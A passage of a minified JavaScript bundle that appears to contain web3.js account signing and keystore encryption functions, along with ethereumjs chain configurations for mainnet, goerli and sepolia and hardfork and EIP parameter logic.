                    const n = (0, t.parseAndValidatePrivateKey)(r), i = (0, t.hashMessage)(e), o = l.secp256k1.sign(i.substring(2), n), s = o.toCompactRawBytes(), a = o.r.toString(16), c = o.s.toString(16), d = o.recovery + 27;
                    return {
                        message: e,
                        messageHash: i,
                        v: (0, u.numberToHex)(d),
                        r: `0x${a}`,
                        s: `0x${c}`,
                        signature: `${(0, u.bytesToHex)(s)}${d.toString(16)}`
                    };
                }, t.signTransaction = (e, t)=>n(void 0, void 0, void 0, function*() {
                        const r = e.sign((0, u.hexToBytes)(t));
                        if ((0, c.isNullish)(r.v) || (0, c.isNullish)(r.r) || (0, c.isNullish)(r.s)) throw new a.TransactionSigningError("Signer Error");
                        const n = r.validate(!0);
                        if (n.length > 0) {
                            let e = "Signer Error ";
                            for (const t of n)e += `${e} ${t}.`;
                            throw new a.TransactionSigningError(e);
                        }
                        const i = (0, u.bytesToHex)(r.serialize()), o = (0, u.sha3Raw)(i);
                        return {
                            messageHash: (0, u.bytesToHex)(r.getMessageToSign(!0)),
                            v: `0x${r.v.toString(16)}`,
                            r: `0x${r.r.toString(16).padStart(64, "0")}`,
                            s: `0x${r.s.toString(16).padStart(64, "0")}`,
                            rawTransaction: i,
                            transactionHash: (0, u.bytesToHex)(o)
                        };
                    }), t.recoverTransaction = (e)=>{
                    if ((0, c.isNullish)(e)) throw new a.UndefinedRawTransactionError;
                    const t = h.TransactionFactory.fromSerializedData((0, u.hexToBytes)(e));
                    return (0, u.toChecksumAddress)(t.getSenderAddress().toString());
                }, t.recover = (e, r, n, i, o)=>{
                    if ("object" == typeof e) {
                        const r = `${e.r}${e.s.slice(2)}${e.v.slice(2)}`;
                        return (0, t.recover)(e.messageHash, r, n);
                    }
                    if ("string" == typeof r && "string" == typeof n && !(0, c.isNullish)(i)) {
                        const s = `${n}${i.slice(2)}${r.slice(2)}`;
                        return (0, t.recover)(e, s, o);
                    }
                    if ((0, c.isNullish)(r)) throw new a.InvalidSignatureError("signature string undefined");
                    const s = n ? e : (0, t.hashMessage)(e), d = r.substring(130), h = l.secp256k1.Signature.fromCompact(r.slice(2, 130)).addRecoveryBit(parseInt(d, 16) - 27).recoverPublicKey(s.replace("0x", "")).toRawBytes(!1), f = (0, u.sha3Raw)(h.subarray(1));
                    return (0, u.toChecksumAddress)(`0x${f.slice(-40)}`);
                }, t.privateKeyToAddress = (e)=>{
                    const r = (0, t.parseAndValidatePrivateKey)(e), n = l.secp256k1.getPublicKey(r, !1), i = (0, u.sha3Raw)(n.slice(1)).slice(-40);
                    return (0, u.toChecksumAddress)(`0x${i}`);
                }, t.encrypt = (e, r, l)=>n(void 0, void 0, void 0, function*() {
                        var n, d, h, f, p, m, g;
                        const y = (0, t.parseAndValidatePrivateKey)(e);
                        let v;
                        if (v = (null == l ? void 0 : l.salt) ? "string" == typeof l.salt ? (0, u.hexToBytes)(l.salt) : l.salt : (0, u.randomBytes)(32), !((0, c.isString)(r) || r instanceof Uint8Array)) throw new a.InvalidPasswordError;
                        const b = "string" == typeof r ? (0, u.hexToBytes)((0, u.utf8ToHex)(r)) : r;
                        let E;
                        if (null == l ? void 0 : l.iv) {
                            if (E = "string" == typeof l.iv ? (0, u.hexToBytes)(l.iv) : l.iv, 16 !== E.length) throw new a.IVLengthError;
                        } else E = (0, u.randomBytes)(16);
                        const A = null !== (n = null == l ? void 0 : l.kdf) && void 0 !== n ? n : "scrypt";
                        let _, w;
                        if ("pbkdf2" === A) {
                            if (w = {
                                dklen: null !== (d = null == l ? void 0 : l.dklen) && void 0 !== d ? d : 32,
                                salt: (0, u.bytesToHex)(v).replace("0x", ""),
                                c: null !== (h = null == l ? void 0 : l.c) && void 0 !== h ? h : 262144,
                                prf: "hmac-sha256"
                            }, w.c < 1e3) throw new a.PBKDF2IterationsError;
                            _ = (0, o.pbkdf2Sync)(b, v, w.c, w.dklen, "sha256");
                        } else {
                            if ("scrypt" !== A) throw new a.InvalidKdfError;
                            w = {
                                n: null !== (f = null == l ? void 0 : l.n) && void 0 !== f ? f : 8192,
                                r: null !== (p = null == l ? void 0 : l.r) && void 0 !== p ? p : 8,
                                p: null !== (m = null == l ? void 0 : l.p) && void 0 !== m ? m : 1,
                                dklen: null !== (g = null == l ? void 0 : l.dklen) && void 0 !== g ? g : 32,
                                salt: (0, u.bytesToHex)(v).replace("0x", "")
                            }, _ = (0, s.scryptSync)(b, v, w.n, w.p, w.r, w.dklen);
                        }
                        const T = yield (0, i.encrypt)(y, _.slice(0, 16), E, "aes-128-ctr"), R = (0, u.bytesToHex)(T).slice(2), I = (0, u.sha3Raw)((0, u.uint8ArrayConcat)(_.slice(16, 32), T)).replace("0x", "");
                        return {
                            version: 3,
                            id: (0, u.uuidV4)(),
                            address: (0, t.privateKeyToAddress)(y).toLowerCase().replace("0x", ""),
                            crypto: {
                                ciphertext: R,
                                cipherparams: {
                                    iv: (0, u.bytesToHex)(E).replace("0x", "")
                                },
                                cipher: "aes-128-ctr",
                                kdf: A,
                                kdfparams: w,
                                mac: I
                            }
                        };
                    }), t.privateKeyToAccount = (e, r)=>{
                    const i = (0, t.parseAndValidatePrivateKey)(e, r);
                    return {
                        address: (0, t.privateKeyToAddress)(i),
                        privateKey: (0, u.bytesToHex)(i),
                        signTransaction: (e)=>{
                            throw new a.TransactionSigningError("Do not have network access to sign the transaction");
                        },
                        sign: (e)=>(0, t.sign)("string" == typeof e ? e : JSON.stringify(e), i),
                        encrypt: (e, r)=>n(void 0, void 0, void 0, function*() {
                                return (0, t.encrypt)(i, e, r);
                            })
                    };
                }, t.create = ()=>{
                    const e = l.secp256k1.utils.randomPrivateKey();
                    return (0, t.privateKeyToAccount)(`${(0, u.bytesToHex)(e)}`);
                }, t.decrypt = (e, r, l)=>n(void 0, void 0, void 0, function*() {
                        const n = "object" == typeof e ? e : JSON.parse(l ? e.toLowerCase() : e);
                        if (c.validator.validateJSONSchema(d.keyStoreSchema, n), 3 !== n.version) throw new a.KeyStoreVersionError;
                        const h = "string" == typeof r ? (0, u.hexToBytes)((0, u.utf8ToHex)(r)) : r;
                        let f;
                        if (c.validator.validate([
                            "bytes"
                        ], [
                            h
                        ]), "scrypt" === n.crypto.kdf) {
                            const e = n.crypto.kdfparams, t = "string" == typeof e.salt ? (0, u.hexToBytes)(e.salt) : e.salt;
                            f = (0, s.scryptSync)(h, t, e.n, e.p, e.r, e.dklen);
                        } else {
                            if ("pbkdf2" !== n.crypto.kdf) throw new a.InvalidKdfError;
                            {
                                const e = n.crypto.kdfparams, t = "string" == typeof e.salt ? (0, u.hexToBytes)(e.salt) : e.salt;
                                f = (0, o.pbkdf2Sync)(h, t, e.c, e.dklen, "sha256");
                            }
                        }
                        const p = (0, u.hexToBytes)(n.crypto.ciphertext);
                        if ((0, u.sha3Raw)((0, u.uint8ArrayConcat)(f.slice(16, 32), p)).replace("0x", "") !== n.crypto.mac) throw new a.KeyDerivationError;
                        const m = yield (0, i.decrypt)((0, u.hexToBytes)(n.crypto.ciphertext), f.slice(0, 16), (0, u.hexToBytes)(n.crypto.cipherparams.iv));
                        return (0, t.privateKeyToAccount)(m);
                    });
            },
            7634: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "goerli",
                    chainId: 5,
                    networkId: 5,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "poa",
                        algorithm: "clique",
                        clique: {
                            period: 15,
                            epoch: 3e4
                        }
                    },
                    comment: "Cross-client PoA test network",
                    url: "https://github.com/goerli/testnet",
                    genesis: {
                        timestamp: "0x5c51a607",
                        gasLimit: 10485760,
                        difficulty: 1,
                        nonce: "0x0000000000000000",
                        extraData: "0x22466c6578692069732061207468696e6722202d204166726900000000000000e0a2bd4258d2768837baa26a28fe71dc079f84c70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "homestead",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "spuriousDragon",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "byzantium",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "constantinople",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "petersburg",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "istanbul",
                            block: 1561651,
                            forkHash: "0xc25efa5c"
                        },
                        {
                            name: "berlin",
                            block: 4460644,
                            forkHash: "0x757a1c47"
                        },
                        {
                            name: "london",
                            block: 5062605,
                            forkHash: "0xb8c6299d"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://goerli.etherscan.io/block/7382818",
                            name: "merge",
                            ttd: "10790000",
                            block: 7382819,
                            forkHash: "0xb8c6299d"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: null,
                            forkHash: null
                        },
                        {
                            name: "shanghai",
                            block: null,
                            forkHash: null
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.goerli.ethdisco.net"
                    ]
                };
            },
            3233: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "mainnet",
                    chainId: 1,
                    networkId: 1,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "pow",
                        algorithm: "ethash",
                        ethash: {}
                    },
                    comment: "The Ethereum main chain",
                    url: "https://ethstats.net/",
                    genesis: {
                        gasLimit: 5e3,
                        difficulty: 17179869184,
                        nonce: "0x0000000000000042",
                        extraData: "0x11bbe8db4e347b4e8c937c1c8370e4b5ed33adb3db69cbdb7a38e1e50b1b82fa"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xfc64ec04"
                        },
                        {
                            name: "homestead",
                            block: 115e4,
                            forkHash: "0x97c2c34c"
                        },
                        {
                            name: "dao",
                            block: 192e4,
                            forkHash: "0x91d1f948"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 2463e3,
                            forkHash: "0x7a64da13"
                        },
                        {
                            name: "spuriousDragon",
                            block: 2675e3,
                            forkHash: "0x3edd5b10"
                        },
                        {
                            name: "byzantium",
                            block: 437e4,
                            forkHash: "0xa00bc324"
                        },
                        {
                            name: "constantinople",
                            block: 728e4,
                            forkHash: "0x668db0af"
                        },
                        {
                            name: "petersburg",
                            block: 728e4,
                            forkHash: "0x668db0af"
                        },
                        {
                            name: "istanbul",
                            block: 9069e3,
                            forkHash: "0x879d6e30"
                        },
                        {
                            name: "muirGlacier",
                            block: 92e5,
                            forkHash: "0xe029e991"
                        },
                        {
                            name: "berlin",
                            block: 12244e3,
                            forkHash: "0x0eb440f6"
                        },
                        {
                            name: "london",
                            block: 12965e3,
                            forkHash: "0xb715077d"
                        },
                        {
                            name: "arrowGlacier",
                            block: 13773e3,
                            forkHash: "0x20c327fc"
                        },
                        {
                            name: "grayGlacier",
                            block: 1505e4,
                            forkHash: "0xf0afd0e3"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://etherscan.io/block/15537393",
                            name: "merge",
                            ttd: "58750000000000000000000",
                            block: 15537394,
                            forkHash: "0xf0afd0e3"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: null,
                            forkHash: null
                        },
                        {
                            name: "shanghai",
                            block: null,
                            forkHash: null
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.mainnet.ethdisco.net"
                    ]
                };
            },
            5077: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "sepolia",
                    chainId: 11155111,
                    networkId: 11155111,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "pow",
                        algorithm: "ethash",
                        ethash: {}
                    },
                    comment: "PoW test network to replace Ropsten",
                    url: "https://github.com/ethereum/go-ethereum/pull/23730",
                    genesis: {
                        timestamp: "0x6159af19",
                        gasLimit: 3e7,
                        difficulty: 131072,
                        nonce: "0x0000000000000000",
                        extraData: "0x5365706f6c69612c20417468656e732c204174746963612c2047726565636521"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "homestead",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "spuriousDragon",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "byzantium",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "constantinople",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "petersburg",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "istanbul",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "muirGlacier",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "berlin",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "london",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://sepolia.etherscan.io/block/1450408",
                            name: "merge",
                            ttd: "17000000000000000",
                            block: 1450409,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: 1735371,
                            forkHash: "0xb96cbd13"
                        },
                        {
                            name: "shanghai",
                            block: null,
                            timestamp: "1677557088",
                            forkHash: "0xf7f9bc08"
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.sepolia.ethdisco.net"
                    ]
                };
            },
            6664: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Common = void 0;
                const i = n(r(1238)), o = r(2699), s = r(9634), a = r(850), u = r(2290), c = n(r(7634)), l = n(r(3233)), d = n(r(5077)), h = r(5257), f = r(4443), p = r(9137), { buf: m } = i.default;
                class g extends o.EventEmitter {
                    constructor(e){
                        var t, r;
                        super(), this._eips = [], this._customChains = null !== (t = e.customChains) && void 0 !== t ? t : [], this._chainParams = this.setChain(e.chain), this.DEFAULT_HARDFORK = null !== (r = this._chainParams.defaultHardfork) && void 0 !== r ? r : f.Hardfork.Merge, this.HARDFORK_CHANGES = this.hardforks().map((e)=>[
                                e.name,
                                p.hardforks[e.name]
                            ]), this._hardfork = this.DEFAULT_HARDFORK, void 0 !== e.hardfork && this.setHardfork(e.hardfork), e.eips && this.setEIPs(e.eips);
                    }
                    static custom(e, t = {}) {
                        var r;
                        const n = null !== (r = t.baseChain) && void 0 !== r ? r : "mainnet", i = Object.assign({}, g._getChainParams(n));
                        if (i.name = "custom-chain", "string" != typeof e) return new g(Object.assign({
                            chain: Object.assign(Object.assign({}, i), e)
                        }, t));
                        if (e === f.CustomChain.PolygonMainnet) return g.custom({
                            name: f.CustomChain.PolygonMainnet,
                            chainId: 137,
                            networkId: 137
                        }, t);
                        if (e === f.CustomChain.PolygonMumbai) return g.custom({
                            name: f.CustomChain.PolygonMumbai,
                            chainId: 80001,
                            networkId: 80001
                        }, t);
                        if (e === f.CustomChain.ArbitrumRinkebyTestnet) return g.custom({
                            name: f.CustomChain.ArbitrumRinkebyTestnet,
                            chainId: 421611,
                            networkId: 421611
                        }, t);
                        if (e === f.CustomChain.ArbitrumOne) return g.custom({
                            name: f.CustomChain.ArbitrumOne,
                            chainId: 42161,
                            networkId: 42161
                        }, t);
                        if (e === f.CustomChain.xDaiChain) return g.custom({
                            name: f.CustomChain.xDaiChain,
                            chainId: 100,
                            networkId: 100
                        }, t);
                        if (e === f.CustomChain.OptimisticKovan) return g.custom({
                            name: f.CustomChain.OptimisticKovan,
                            chainId: 69,
                            networkId: 69
                        }, Object.assign({
                            hardfork: f.Hardfork.Berlin
                        }, t));
                        if (e === f.CustomChain.OptimisticEthereum) return g.custom({
                            name: f.CustomChain.OptimisticEthereum,
                            chainId: 10,
                            networkId: 10
                        }, Object.assign({
                            hardfork: f.Hardfork.Berlin
                        }, t));
                        throw new Error(`Custom chain ${e} not supported`);
                    }
                    static fromGethGenesis(e, { chain: t, eips: r, genesisHash: n, hardfork: i, mergeForkIdPostMerge: o }) {
                        var s;
                        const a = (0, u.parseGethGenesis)(e, t, o), c = new g({
                            chain: null !== (s = a.name) && void 0 !== s ? s : "custom",
                            customChains: [
                                a
                            ],
                            eips: r,
                            hardfork: null != i ? i : a.hardfork
                        });
                        return void 0 !== n && c.setForkHashes(n), c;
                    }
                    static isSupportedChainId(e) {
                        const t = this._getInitializedChains();
                        return Boolean(t.names[e.toString()]);
                    }
                    static _getChainParams(e, t) {
                        let r = e;
                        const n = this._getInitializedChains(t);
                        if ("number" == typeof r || "bigint" == typeof r) {
                            if (r = r.toString(), n.names[r]) return n[n.names[r]];
                            throw new Error(`Chain with ID ${r} not supported`);
                        }
                        if (void 0 !== n[r]) return n[r];
                        throw new Error(`Chain with name ${r} not supported`);
                    }
                    setChain(e) {
                        if ("number" == typeof e || "bigint" == typeof e || "string" == typeof e) this._chainParams = g._getChainParams(e, this._customChains);
                        else {
                            if ("object" != typeof e) throw new Error("Wrong input format");
                            {
                                if (this._customChains.length > 0) throw new Error("Chain must be a string, number, or bigint when initialized with customChains passed in");
                                const t = [
                                    "networkId",
                                    "genesis",
                                    "hardforks",
                                    "bootstrapNodes"
                                ];
                                for (const r of t)if (!(r in e)) throw new Error(`Missing required chain parameter: ${r}`);
                                this._chainParams = e;
                            }
                        }
                        for (const e of this.hardforks())if (void 0 === e.block) throw new Error("Hardfork cannot have undefined block number");
                        return this._chainParams;
                    }
                    setHardfork(e) {
                        let t = !1;
                        for (const r of this.HARDFORK_CHANGES)r[0] === e && (this._hardfork !== e && (this._hardfork = e, this.emit("hardforkChanged", e)), t = !0);
                        if (!t) throw new Error(`Hardfork with name ${e} not supported`);
                    }
                    getHardforkByBlockNumber(e, t, r) {
                        const n = (0, u.toType)(e, a.TypeOutput.BigInt), i = (0, u.toType)(t, a.TypeOutput.BigInt), o = (0, u.toType)(r, a.TypeOutput.Number), s = this.hardforks().filter((e)=>null !== e.block || null !== e.ttd && void 0 !== e.ttd || void 0 !== e.timestamp), c = s.findIndex((e)=>null !== e.ttd && void 0 !== e.ttd);
                        if (s.slice(c + 1).findIndex((e)=>null !== e.ttd && void 0 !== e.ttd) >= 0) throw Error("More than one merge hardforks found with ttd specified");
                        let l = s.findIndex((e)=>null !== e.block && e.block > n || void 0 !== o && Number(e.timestamp) > o);
                        if (-1 === l) l = s.length;
                        else if (0 === l) throw Error("Must have at least one hardfork at block 0");
                        if (void 0 === o && (l -= s.slice(0, l).reverse().findIndex((e)=>null !== e.block || void 0 !== e.ttd)), l -= 1, null === s[l].block && void 0 === s[l].timestamp) (null == i || BigInt(s[l].ttd) > i) && (l -= 1);
                        else if (c >= 0 && null != i) {
                            if (l >= c && BigInt(s[c].ttd) > i) throw Error("Maximum HF determined by total difficulty is lower than the block number HF");
                            if (l < c && BigInt(s[c].ttd) <= i) throw Error("HF determined by block number is lower than the minimum total difficulty HF");
                        }
                        const d = l;
                        for(; l < s.length - 1 && s[l].block === s[l + 1].block && s[l].timestamp === s[l + 1].timestamp; l += 1);
                        if (o) {
                            if (s.slice(0, d).reduce((e, t)=>{
                                var r;
                                return Math.max(Number(null !== (r = t.timestamp) && void 0 !== r ? r : "0"), e);
                            }, 0) > o) throw Error("Maximum HF determined by timestamp is lower than the block number/ttd HF");
                            if (s.slice(l + 1).reduce((e, t)=>{
                                var r;
                                return Math.min(Number(null !== (r = t.timestamp) && void 0 !== r ? r : o), e);
                            }, o) < o) throw Error("Maximum HF determined by block number/ttd is lower than timestamp HF");
                        }
                        return s[l].name;
                    }
                    setHardforkByBlockNumber(e, t, r) {
                        const n = this.getHardforkByBlockNumber(e, t, r);
                        return this.setHardfork(n), n;
                    }
                    _getHardfork(e) {
                        const t = this.hardforks();
                        for (const r of t)if (r.name === e) return r;
                        return null;
                    }
                    setEIPs(e = []) {
                        for (const t of e){
                            if (!(t in h.EIPs)) throw new Error(`${t} not supported`);
                            const r = this.gteHardfork(h.EIPs[t].minimumHardfork);
                            if (!r) throw new Error(`${t} cannot be activated on hardfork ${this.hardfork()}, minimumHardfork: ${r}`);
                            if (void 0 !== h.EIPs[t].requiredEIPs) {
                                for (const r of h.EIPs[t].requiredEIPs)if (!e.includes(r) && !this.isActivatedEIP(r)) throw new Error(`${t} requires EIP ${r}, but is not included in the EIP list`);
                            }
                        }
                        this._eips = e;
                    }
                    param(e, t) {
                        let r;
                        for (const n of this._eips)if (r = this.paramByEIP(e, t, n), void 0 !== r) return r;
                        return this.paramByHardfork(e, t, this._hardfork);
                    }
                    paramByHardfork(e, t, r) {
                        let n = null;
                        for (const i of this.HARDFORK_CHANGES){
                            if ("eips" in i[1]) {
                                const r = i[1].eips;
                                for (const i of r){
                                    const r = this.paramByEIP(e, t, i);
                                    n = "bigint" == typeof r ? r : n;
                                }
                            } else {
                                if (void 0 === i[1][e]) throw new Error(`Topic ${e} not defined`);
                                void 0 !== i[1][e][t] && (n = i[1][e][t].v);
                            }
                            if (i[0] === r) break;
                        }
                        return BigInt(null != n ? n : 0);
                    }
                    paramByEIP(e, t, r) {
                        if (!(r in h.EIPs)) throw new Error(`${r} not supported`);
                        const n = h.EIPs[r];
                        if (!(e in n)) throw new Error(`Topic ${e} not defined`);
                        if (void 0 === n[e][t]) return;
                        const i = n[e][t].v;
                        return BigInt(i);
                    }
                    paramByBlock(e, t, r, n, i) {
                        const o = this.getHardforkByBlockNumber(r, n, i);
                        return this.paramByHardfork(e, t, o);
                    }
                    isActivatedEIP(e) {
                        if (this.eips().includes(e)) return !0;
                        for (const t of this.HARDFORK_CHANGES){
                            const r = t[1];
                            if (this.gteHardfork(r.name) && "eips" in r && r.eips.includes(e)) return !0;
                        }
                        return !1;
                    }
                    hardforkIsActiveOnBlock(e, t) {
                        const r = (0, u.toType)(t, a.TypeOutput.BigInt), n = null != e ? e : this._hardfork, i = this.hardforkBlock(n);
                        return "bigint" == typeof i && i !== BigInt(0) && r >= i;
                    }
                    activeOnBlock(e) {
                        return this.hardforkIsActiveOnBlock(null, e);
                    }
                    hardforkGteHardfork(e, t) {
                        const r = null != e ? e : this._hardfork, n = this.hardforks();
                        let i = -1, o = -1, s = 0;
                        for (const e of n)e.name === r && (i = s), e.name === t && (o = s), s += 1;
                        return i >= o && -1 !== o;
                    }
                    gteHardfork(e) {
                        return this.hardforkGteHardfork(null, e);
                    }
                    hardforkBlock(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.block;
                        return null == n ? null : BigInt(n);
                    }
                    hardforkTimestamp(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.timestamp;
                        return null == n ? null : BigInt(n);
                    }
                    eipBlock(e) {
                        for (const t of this.HARDFORK_CHANGES){
                            const r = t[1];
                            if ("eips" in r && r.eips.includes(e)) return this.hardforkBlock("number" == typeof t[0] ? String(t[0]) : t[0]);
                        }
                        return null;
                    }
                    hardforkTTD(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.ttd;
                        return null == n ? null : BigInt(n);
                    }
                    isHardforkBlock(e, t) {
                        const r = (0, u.toType)(e, a.TypeOutput.BigInt), n = null != t ? t : this._hardfork, i = this.hardforkBlock(n);
                        return "bigint" == typeof i && i !== BigInt(0) && i === r;
                    }
                    nextHardforkBlockOrTimestamp(e) {
                        var t, r;
                        const n = null != e ? e : this._hardfork, i = this.hardforks();
                        let o = i.findIndex((e)=>e.name === n);
                        if (n === f.Hardfork.Merge && (o -= 1), o < 0) return null;
                        let s = null !== (t = i[o].timestamp) && void 0 !== t ? t : i[o].block;
                        s = null != s ? Number(s) : null;
                        const a = i.slice(o + 1).find((e)=>{
                            var t;
                            let r = null !== (t = e.timestamp) && void 0 !== t ? t : e.block;
                            return r = null != r ? Number(r) : null, e.name !== f.Hardfork.Merge && null != r && r !== s;
                        });
                        if (void 0 === a) return null;
                        const u = null !== (r = a.timestamp) && void 0 !== r ? r : a.block;
                        return null == u ? null : BigInt(u);
                    }
                    nextHardforkBlock(e) {
                        const t = null != e ? e : this._hardfork;
                        let r = this.hardforkBlock(t);
                        if (null === r && t === f.Hardfork.Merge) {
                            const e = this.hardforks(), t = e.findIndex((e)=>null !== e.ttd && void 0 !== e.ttd);
                            if (t < 0) throw Error("Merge hardfork should have been found");
                            r = this.hardforkBlock(e[t - 1].name);
                        }
                        return null === r ? null : this.hardforks().reduce((e, t)=>{
                            const n = BigInt(null === t.block || void 0 !== t.ttd && null !== t.ttd ? 0 : t.block);
                            return n > r && null === e ? n : e;
                        }, null);
                    }
                    isNextHardforkBlock(e, t) {
                        const r = (0, u.toType)(e, a.TypeOutput.BigInt), n = null != t ? t : this._hardfork, i = this.nextHardforkBlock(n);
                        return null !== i && i === r;
                    }
                    _calcForkHash(e, t) {
                        let r = new Uint8Array, n = 0;
                        for (const t of this.hardforks()){
                            const { block: i, timestamp: o, name: a } = t;
                            let u = null != o ? o : i;
                            if (u = null !== u ? Number(u) : null, "number" == typeof u && 0 !== u && u !== n && a !== f.Hardfork.Merge) {
                                const e = (0, s.hexToBytes)(u.toString(16).padStart(16, "0"));
                                r = (0, s.uint8ArrayConcat)(r, e), n = u;
                            }
                            if (t.name === e) break;
                        }
                        const i = (0, s.uint8ArrayConcat)(t, r);
                        return (0, s.bytesToHex)((0, u.intToUint8Array)(m(i) >>> 0));
                    }
                    forkHash(e, t) {
                        const r = null != e ? e : this._hardfork, n = this._getHardfork(r);
                        if (null === n || null === (null == n ? void 0 : n.block) && void 0 === (null == n ? void 0 : n.timestamp) && void 0 === (null == n ? void 0 : n.ttd)) throw new Error("No fork hash calculation possible for future hardfork");
                        if (null !== (null == n ? void 0 : n.forkHash) && void 0 !== (null == n ? void 0 : n.forkHash)) return n.forkHash;
                        if (!t) throw new Error("genesisHash required for forkHash calculation");
                        return this._calcForkHash(r, t);
                    }
                    hardforkForForkHash(e) {
                        const t = this.hardforks().filter((t)=>t.forkHash === e);
                        return t.length >= 1 ? t[t.length - 1] : null;
                    }
                    setForkHashes(e) {
                        var t;
                        for (const r of this.hardforks()){
                            const n = null !== (t = r.timestamp) && void 0 !== t ? t : r.block;
                            null !== r.forkHash && void 0 !== r.forkHash || null == n && void 0 === r.ttd || (r.forkHash = this.forkHash(r.name, e));
                        }
                    }
                    genesis() {
                        return this._chainParams.genesis;
                    }
                    hardforks() {
                        return this._chainParams.hardforks;
                    }
                    bootstrapNodes() {
                        return this._chainParams.bootstrapNodes;
                    }
                    dnsNetworks() {
                        return this._chainParams.dnsNetworks;
                    }
                    hardfork() {
                        return this._hardfork;
                    }
                    chainId() {
                        return BigInt(this._chainParams.chainId);
                    }
                    chainName() {
                        return this._chainParams.name;
                    }
                    networkId() {
                        return BigInt(this._chainParams.networkId);
                    }
                    eips() {
                        return this._eips;
                    }
                    consensusType() {
                        const e = this.hardfork();
                        let t;
                        for (const r of this.HARDFORK_CHANGES)if ("consensus" in r[1] && (t = r[1].consensus.type), r[0] === e) break;
                        return null != t ? t : this._chainParams.consensus.type;
                    }
                    consensusAlgorithm() {
                        const e = this.hardfork();
                        let t;
                        for (const r of this.HARDFORK_CHANGES)if ("consensus" in r[1] && (t = r[1].consensus.algorithm), r[0] === e) break;
                        return null != t ? t : this._chainParams.consensus.algorithm;
                    }
                    consensusConfig() {
                        var e;
                        const t = this.hardfork();
                        let r;
                        for (const e of this.HARDFORK_CHANGES)if ("consensus" in e[1] && (r = e[1].consensus[e[1].consensus.algorithm]), e[0] === t) break;
                        return null !== (e = null != r ? r : this._chainParams.consensus[this.consensusAlgorithm()]) && void 0 !== e ? e : {};
                    }
                    copy() {
                        const e = Object.assign(Object.create(Object.getPrototypeOf(this)), this);
                        return e.removeAllListeners(), e;
                    }
                    static _getInitializedChains(e) {
                        const t = {};
                        for (const [e, r] of Object.entries(f.Chain))t[r] = e.toLowerCase();
                        const r = {
                            mainnet: l.default,
                            goerli: c.default,
                            sepolia: d.default
                        };
                        if (e) for (const n of e){
                            const { name: e } = n;
                            t[n.chainId.toString()] = e, r[e] = n;
                        }
                        return r.names = t, r;
                    }
                }
                t.Common = g;
            },
            2819: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-1153",
                    number: 1153,
                    comment: "Transient Storage",
                    url: "https://eips.ethereum.org/EIPS/eip-1153",
                    status: "Review",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        tstore: {
                            v: 100,
                            d: "Base fee of the TSTORE opcode"
                        },
                        tload: {
                            v: 100,
                            d: "Base fee of the TLOAD opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
